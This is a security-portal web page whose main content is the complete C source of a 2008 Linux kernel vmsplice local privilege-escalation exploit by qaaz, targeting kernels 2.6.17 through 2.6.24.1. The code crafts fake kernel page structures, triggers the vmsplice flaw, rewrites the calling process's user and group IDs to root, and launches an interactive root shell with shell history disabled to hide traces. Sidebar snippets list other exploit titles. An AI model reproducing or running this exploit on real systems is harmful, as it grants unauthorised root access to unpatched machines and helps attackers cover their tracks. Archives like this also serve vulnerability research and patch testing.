SecuMania Security Portal - Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit

Members Login

Rss Feeds

Get our latest content via RSS feeds.

Report a Vulnerability

Report a vulnerability or exploit that you have found to SecuMania.
vul[at]SecuMania.org

I cant say I feel sorry for him, stupid spammer got what he deserved. We all know how it feels to op...

Advanced Image Hosting (AIH) 2.1 Remote ...

thanks

Realsecure CGI Attack Subversion Vulnera...

hi webmaster,plz help me to find any information about account harvesting and traversal path attack ...

INDEXU <= 5.0.1 (admin_template_path) Re...

Hello Webmasters My name is Nikolai. I am making an organization for the protection internet users f...

Advanced Image Hosting (AIH) 2.1 Remote ...

good job you are the best . mgharba talmout :d

Online Rental Property Script <= 4.5 (pi...

Hello, The reported problem has been fixed. Regards, Catalina Danila Online Rent Customer Supp...

netOffice Dwins Authentication Bypass Vu...

Not Vulnerable: Luis Wang netOffice Dwins 1.3.1 visit website http://netofficedwins .sourceforge.ne...

BM Classifieds <= 20080409 Multiple SQL ...

Current version of script corrected. Security patch available to registered users in the user foru...

Nukedit 4.9.x Remote Create Admin Exploi...

But i think to protect the password is not needed because it's not used in the SQL-Execute statement...

Nukedit 4.9.x Remote Create Admin Exploi...

you may find that your hotfix doesnt stop the password field from having SQL injected into it. This ...

Packet Storm

Visits today:	782
Visits yesterday:	865
Visits month:	6736
Visits total:	440383
Pages total:	8287095

Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit

Saturday, 09 February 2008

Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit
Author:	qaaz
Date:	2008-02-09
Download:

/*
 * jessica_biel_naked_in_my_bed.c
 *
 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * This is quite old code and I had to rewrite it to even compile.
 * It should work well, but I don't remeber original intent of all
 * the code, so I'm not 100% sure about it. You've been warned ;)
 * 
 * -static -Wno-format  
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>
 
#define PIPE_BUFFERS  16
#define PG_compound  14
#define uint    unsigned int
#define static_inline  static inline __attribute__((always_inline))
#define STACK(x)  (x + sizeof(x) - 40)
 
struct page {
  unsigned long flags;
  int count;
  int mapcount;
  unsigned long private;
  void *mapping;
  unsigned long index;
  struct { long next, prev; } lru;
};
 
void  exit_code();
char  exit_stack[1024 * 1024];
 
void  die(char *msg, int err)
{
  printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
  fflush(stdout);
  fflush(stderr);
  exit(1);
}
 
#if defined (__i386__)
 
#ifndef __NR_vmsplice
#define __NR_vmsplice  316
#endif
 
#define USER_CS    0x73
#define USER_SS    0x7b
#define USER_FL    0x246
 
static_inline
void  exit_kernel()
{
  __asm__ __volatile__ (
  "movl %0, 0x10(%%esp) ;"
  "movl %1, 0x0c(%%esp) ;"
  "movl %2, 0x08(%%esp) ;"
  "movl %3, 0x04(%%esp) ;"
  "movl %4, 0x00(%%esp) ;"
  "iret"
  : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
      "i" (USER_CS), "r" (exit_code)
  );
}
 
static_inline
void *  get_current()
{
  unsigned long curr;
  __asm__ __volatile__ (
  "movl %%esp, %%eax ;"
  "andl %1, %%eax ;"
  "movl (%%eax), %0"
  : "=r" (curr)
  : "i" (~8191)
  );
  return (void *) curr;
}
 
#elif defined (__x86_64__)
 
#ifndef __NR_vmsplice
#define __NR_vmsplice  278
#endif
 
#define USER_CS    0x23
#define USER_SS    0x2b
#define USER_FL    0x246
 
static_inline
void  exit_kernel()
{
  __asm__ __volatile__ (
  "swapgs ;"
  "movq %0, 0x20(%%rsp) ;"
  "movq %1, 0x18(%%rsp) ;"
  "movq %2, 0x10(%%rsp) ;"
  "movq %3, 0x08(%%rsp) ;"
  "movq %4, 0x00(%%rsp) ;"
  "iretq"
  : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
      "i" (USER_CS), "r" (exit_code)
  );
}
 
static_inline
void *  get_current()
{
  unsigned long curr;
  __asm__ __volatile__ (
  "movq %%gs:(0), %0"
  : "=r" (curr)
  );
  return (void *) curr;
}
 
#else
#error "unsupported arch"
#endif
 
#if defined (_syscall4)
#define __NR__vmsplice  __NR_vmsplice
_syscall4(
  long, _vmsplice,
  int, fd,
  struct iovec *, iov,
  unsigned long, nr_segs,
  unsigned int, flags)
 
#else
#define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
 
static uint uid, gid;
 
void  kernel_code()
{
  int  i;
  uint  *p = get_current();
 
  for (i = 0; i < 1024-13; i++) {
    if (p[0] == uid && p[1] == uid &&
        p[2] == uid && p[3] == uid &&
        p[4] == gid && p[5] == gid &&
        p[6] == gid && p[7] == gid) {
      p[0] = p[1] = p[2] = p[3] = 0;
      p[4] = p[5] = p[6] = p[7] = 0;
      p = (uint *) ((char *)(p + 8) + sizeof(void *));
      p[0] = p[1] = p[2] = ~0;
      break;
    }
    p++;
  }  
 
  exit_kernel();
}
 
void  exit_code()
{
  if (getuid() != 0)
    die("wtf", 0);
 
  printf("[+] root\n");
  putenv("HISTFILE=/dev/null");
  execl("/bin/bash", "bash", "-i", NULL);
  die("/bin/bash", errno);
}
 
int  main(int argc, char *argv[])
{
  int    pi[2];
  size_t    map_size;
  char *    map_addr;
  struct iovec  iov;
  struct page *  pages[5];
 
  uid = getuid();
  gid = getgid();
  setresuid(uid, uid, uid);
  setresgid(gid, gid, gid);
 
  printf("-----------------------------------\n");
  printf(" Linux vmsplice Local Root Exploit\n");
  printf(" By qaaz\n");
  printf("-----------------------------------\n");
 
  if (!uid || !gid)
    die("!@#$", 0);
 
  /*****/
  pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
  pages[1] = pages[0] + 1;
 
  map_size = PAGE_SIZE;
  map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                  MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (map_addr == MAP_FAILED)
    die("mmap", errno);
 
  memset(map_addr, 0, map_size);
  printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  printf("[+] page: 0x%lx\n", pages[0]);
  printf("[+] page: 0x%lx\n", pages[1]);
 
  pages[0]->flags    = 1 << PG_compound;
  pages[0]->private  = (unsigned long) pages[0];
  pages[0]->count    = 1;
  pages[1]->lru.next = (long) kernel_code;
 
  /*****/
  pages[2] = *(void **) pages[0];
  pages[3] = pages[2] + 1;
 
  map_size = PAGE_SIZE;
  map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                  MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (map_addr == MAP_FAILED)
    die("mmap", errno);
 
  memset(map_addr, 0, map_size);
  printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  printf("[+] page: 0x%lx\n", pages[2]);
  printf("[+] page: 0x%lx\n", pages[3]);
 
  pages[2]->flags    = 1 << PG_compound;
  pages[2]->private  = (unsigned long) pages[2];
  pages[2]->count    = 1;
  pages[3]->lru.next = (long) kernel_code;
 
  /*****/
  pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
  map_size = PAGE_SIZE;
  map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                  MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (map_addr == MAP_FAILED)
    die("mmap", errno);
  memset(map_addr, 0, map_size);
  printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  printf("[+] page: 0x%lx\n", pages[4]);
 
  /*****/
  map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
  map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (map_addr == MAP_FAILED)
    die("mmap", errno);
 
  memset(map_addr, 0, map_size);
  printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
 
  /*****/
  map_size -= 2 * PAGE_SIZE;
  if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
    die("munmap", errno);
 
  /*****/
  if (pipe(pi) < 0) die("pipe", errno);
  close(pi[0]);
 
  iov.iov_base = map_addr;
  iov.iov_len  = ULONG_MAX;
 
  signal(SIGPIPE, exit_code);
  _vmsplice(pi[1], &iov, 1, 0);
  die("vmsplice", errno);
  return 0;
}